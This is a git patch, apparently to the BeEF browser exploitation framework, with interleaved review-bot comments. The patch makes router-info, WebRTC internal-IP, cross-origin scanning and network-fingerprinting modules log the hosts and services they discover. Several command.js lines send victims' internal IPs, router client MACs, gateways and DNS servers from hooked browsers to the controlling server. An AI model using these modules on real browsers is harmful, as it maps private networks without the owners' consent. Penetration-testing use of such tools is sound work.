From df08d99cd526a24ac8d4442dbdfac3889dfb326b Mon Sep 17 00:00:00 2001
From: Brendan Coles
Date: Sun, 18 Jan 2015 13:41:24 +0000
Subject: [PATCH] Report identified hosts to network extension
---
 core/main/handlers/browserdetails.rb | 7 +++
 .../router/asus_rt_series_get_info/command.js | 3 +-
 .../router/asus_rt_series_get_info/module.rb | 48 +++++++++++++++++++
 .../host/get_internal_ip_webrtc/command.js | 3 +-
 modules/host/get_internal_ip_webrtc/module.rb | 22 +++++++++
 .../network/cross_origin_scanner/module.rb | 19 ++++++++
 .../command.js | 2 +-
 .../internal_network_fingerprinting/module.rb | 20 ++++++++
 8 files changed, 121 insertions(+), 3 deletions(-)
diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb
index 0541d3393..a91e2c937 100644
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -177,6 +177,13 @@ module BeEF
 unless proxy_server.nil?
 BD.set(session_id, 'ProxyServer', "#{proxy_server}")
 proxy_log_string += " [server: #{proxy_server}]"
+ if config.get("beef.extension.network.enable") == true
+ if proxy_server =~ /^([\d\.]+):([\d]+)$/
+ print_debug("Hooked browser [id:#{zombie.id}] is using a proxy [ip: #{$1}]")
+ r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => $1, :type => 'Proxy', :cid => 'init')
+ r.save
+ end
+ end
 end
 BeEF::Core::Logger.instance.register('Zombie', "#{proxy_log_string}", "#{zombie.id}")
 end
diff --git a/modules/exploits/router/asus_rt_series_get_info/command.js b/modules/exploits/router/asus_rt_series_get_info/command.js
index 41628fc89..389724480 100644
--- a/modules/exploits/router/asus_rt_series_get_info/command.js
+++ b/modules/exploits/router/asus_rt_series_get_info/command.js
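Review bot: In core/main/handlers/browserdetails.rb the new check `proxy_server =~ /^([\d\.]+):([\d]+)$/` uses `^`/`$`, which in Ruby anchor at line boundaries rather than at the ends of the string, so a multi-line `proxy_server` value still matches on any one of its lines; `if proxy_server =~ /\A([\d\.]+):(\d+)\z/` validates the whole value. Only the digits-and-dots group `$1` is stored, so this is hardening rather than a demonstrated flaw, and the same anchors recur in the client, DNS and interface checks added to asus_rt_series_get_info/module.rb and get_internal_ip_webrtc/module.rb. The record is created with `:cid => 'init'` while every module hunk in this patch passes an Integer (`@datastore['cid'].to_i`), and the result of `r.save` is discarded, so if the model rejects the string the proxy host would be dropped silently — worth confirming against the NetworkHost model, which is not shown here. The enclosing method starts and ends outside the hunk.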
@@ -31,7 +31,8 @@ beef.execute(function() { beef.debug(target_ip + " - gathering info completed"); beef.net.send("<%= @command_url %>", <%= @command_id %>, - "clients=" + clients + + "ip=" + target_ip + + "&clients=" + clients + "&wanip=" + wanip + "&netmask=" + netmask + "&gateway=" + gateway + diff --git a/modules/exploits/router/asus_rt_series_get_info/module.rb b/modules/exploits/router/asus_rt_series_get_info/module.rb index 0c476a671..d3e58601b 100644 --- a/modules/exploits/router/asus_rt_series_get_info/module.rb +++ b/modules/exploits/router/asus_rt_series_get_info/module.rb 
@@ -13,6 +13,54 @@ class Asus_rt_series_get_info < BeEF::Core::Command def post_execute save({'result' => @datastore['result']}) + + configuration = BeEF::Core::Configuration.instance + if configuration.get("beef.extension.network.enable") == true + + session_id = @datastore['beefhook'] + cid = @datastore['cid'].to_i + + # log the network hosts + if @datastore['results'] =~ /ip=(.+)&clients=(.+)&wanip=(.+)&netmask=(.+)&gateway=(.+)&dns=(.+)/ + ip = "#{$1}" + clients = "#{$2}" + wanip = "#{$3}" + netmask = "#{$4}" + gateway = "#{$5}" + dns_servers = "#{$6}" + + if !ip.nil? + print_debug("Hooked browser found Asus RT series router [ip: #{ip}]") + r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :type => 'Asus Router', :cid => cid) + r.save + r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => 'http', :ip => ip, :port => 80, :type => 'HTTP Server', :cid => cid) + r.save + end + clients.scan(/([\d\.]+,[:\dA-F]{17})/).flatten.each do |client| + next if client.nil? + if client.to_s =~ /^([\d\.]+),([:\dA-F]{17})$/ + ip = $1 + mac = $2 + print_debug("Hooked browser found router client [ip: #{ip}, mac: #{mac}]") + r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :mac => mac, :cid => cid) + r.save + end + end + if !gateway.nil? + print_debug("Hooked browser found WAN gateway server [ip: #{gateway}]") + r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => gateway, :type => 'WAN Gateway', :cid => cid) + r.save + end + if !dns_servers.nil? && dns_servers =~ /^([\d\. ]+)$/ + dns_servers.split(/ /).uniq.each do |dns| + print_debug("Hooked browser found DNS server [ip: #{dns}]") + r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => dns, :type => 'DNS Server', :cid => cid) + r.save + end + end + end + end + end end 
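Review bot: The fields parsed from `@datastore['results']` in `post_execute` are written to NetworkHost and NetworkService with no format check: `ip=(.+)` and `gateway=(.+)` are greedy `.+` groups, and the string is whatever came back through `beef.net.send`, so a malformed or tampered response puts arbitrary text into the `ip` column. The guards `if !ip.nil?` and `if !gateway.nil?` can never fail, because `"#{$1}"` is always a String. Narrowing the capture to `ip=([\d\.]+)` and replacing the gateway guard with `if gateway =~ /\A[\d\.]+\z/` would keep only address-shaped values, in line with how the client and DNS entries are already filtered. cross_origin_scanner/module.rb (`ip=(.+)`) and internal_network_fingerprinting/module.rb (`proto=(.+)`, `ip=(.+)`, `discovered=(.+)`) have the same gap, and `wanip` and `netmask` are captured here but never used.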
diff --git a/modules/host/get_internal_ip_webrtc/command.js b/modules/host/get_internal_ip_webrtc/command.js index 43e00a02d..277591d05 100755 --- a/modules/host/get_internal_ip_webrtc/command.js +++ b/modules/host/get_internal_ip_webrtc/command.js @@ -35,7 +35,8 @@ beef.execute(function() { if (newAddr in addrs) return; else addrs[newAddr] = true; var displayAddrs = Object.keys(addrs).filter(function (k) { return addrs[k]; }); - beef.net.send('<%= @command_url %>', <%= @command_id %>, "IP is " + displayAddrs.join(" or perhaps ")); + beef.debug("Found IPs: "+ displayAddrs.join(",")) + beef.net.send('<%= @command_url %>', <%= @command_id %>, "IP is " + displayAddrs.join(",")); } function grepSDP(sdp) { diff --git a/modules/host/get_internal_ip_webrtc/module.rb b/modules/host/get_internal_ip_webrtc/module.rb index fd2c4dddb..466cbdb12 100755 --- a/modules/host/get_internal_ip_webrtc/module.rb +++ b/modules/host/get_internal_ip_webrtc/module.rb @@ -9,6 +9,28 @@ class Get_internal_ip_webrtc < BeEF::Core::Command content = {} content['Result'] = @datastore['result'] save content + + configuration = BeEF::Core::Configuration.instance + if configuration.get("beef.extension.network.enable") == true + + session_id = @datastore['beefhook'] + cid = @datastore['cid'].to_i + + # save the network host + if @datastore['results'] =~ /IP is ([\d\.,]+)/ + ips = $1.to_s.split(/,/) + if !ips.nil? && !ips.empty? + ips.uniq.each do |ip| + next unless ip =~ /^[\d\.]+$/ + next if ip =~ /^0\.0\.0\.0$/ + print_debug("Hooked browser has network interface #{ip}") + r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :cid => cid) + r.save + end + end + end + end + end end diff --git a/modules/network/cross_origin_scanner/module.rb b/modules/network/cross_origin_scanner/module.rb index 0c3902bf0..4a080bc21 100644 --- a/modules/network/cross_origin_scanner/module.rb +++ b/modules/network/cross_origin_scanner/module.rb 
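Review bot: In get_internal_ip_webrtc/module.rb the outer match `IP is ([\d\.,]+)` stops at the first character outside that class, so an address such as `2001:db8::1` would be captured as `2001`, pass `next unless ip =~ /^[\d\.]+$/`, and be saved as a host; whether the browser-side code can report an IPv6 candidate is not visible in this hunk. The per-address filter also accepts any run of digits and dots (`1..2`, `999.1`), so a dotted-quad test such as `next unless ip =~ /\A\d{1,3}(\.\d{1,3}){3}\z/` is closer to the intent. `!ips.nil?` is redundant because `split` always returns an Array. The enclosing method begins outside the hunk.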
@@ -9,6 +9,25 @@ class Cross_origin_scanner < BeEF::Core::Command content = {} content['result'] = @datastore['result'] save content + + configuration = BeEF::Core::Configuration.instance + if configuration.get("beef.extension.network.enable") == true + + session_id = @datastore['beefhook'] + cid = @datastore['cid'].to_i + + # log the network service + if @datastore['results'] =~ /ip=(.+)&port=([\d]+)&status/ + ip = $1 + port = $2 + print_debug("Hooked browser found HTTP server #{ip}:#{port}") + if !ip.nil? && !port.nil? + r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => 'http', :ip => ip, :port => port, :type => 'HTTP Server (CORS)', :cid => cid) + r.save + end + end + end + end def self.options diff --git a/modules/network/internal_network_fingerprinting/command.js b/modules/network/internal_network_fingerprinting/command.js index 79565b7e3..a11a03862 100644 --- a/modules/network/internal_network_fingerprinting/command.js +++ b/modules/network/internal_network_fingerprinting/command.js @@ -244,7 +244,7 @@ beef.execute(function() { img.onerror = function() { dom.removeChild(this); } img.onload = function() { if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) { - beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+signature_name+"&url="+escape(this.src));dom.removeChild(this); + beef.net.send('<%= @command_url %>', <%= @command_id %>,'proto='+proto+'&ip='+ip+'&port='+port+'&discovered='+signature_name+"&url="+escape(this.src));dom.removeChild(this); beef.debug("[Network Fingerprint] Found [" + signature_name + "] with URL [" + escape(this.src) + "]"); } } diff --git a/modules/network/internal_network_fingerprinting/module.rb b/modules/network/internal_network_fingerprinting/module.rb index 971e02e83..cb928e86f 100644 --- a/modules/network/internal_network_fingerprinting/module.rb +++ b/modules/network/internal_network_fingerprinting/module.rb 
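Review bot: In cross_origin_scanner/module.rb `port = $2` stays a String, whereas the Asus router module in this patch stores `:port => 80` as an Integer; `port = $2.to_i` keeps NetworkService rows consistent however the column is typed (the model is not shown). The same applies to `port = $3` in internal_network_fingerprinting/module.rb. The `if !ip.nil? && !port.nil?` guard cannot fail once the regex has matched, and `print_debug` runs before it, so the guard could be dropped or replaced with a real format check on `ip`. The enclosing method begins outside the hunk.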
@@ -24,5 +24,25 @@ class Internal_network_fingerprinting < BeEF::Core::Command
 content['fail'] = 'No devices/applications have been discovered.'
 end
 save content
+
+ configuration = BeEF::Core::Configuration.instance
+ if configuration.get("beef.extension.network.enable") == true
+ if @datastore['results'] =~ /^proto=(.+)&ip=(.+)&port=([\d]+)&discovered=(.+)&url=(.+)/
+ proto = $1
+ ip = $2
+ port = $3
+ discovered = $4
+ url = $5
+ session_id = @datastore['beefhook']
+ cid = @datastore['cid'].to_i
+ if !ip.nil?
+ print_debug("Hooked browser found '#{discovered}' [ip: #{ip}]")
+ r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => discovered, :cid => cid)
+ r.save
+ end
+ end
+
+ end
+
 end
 end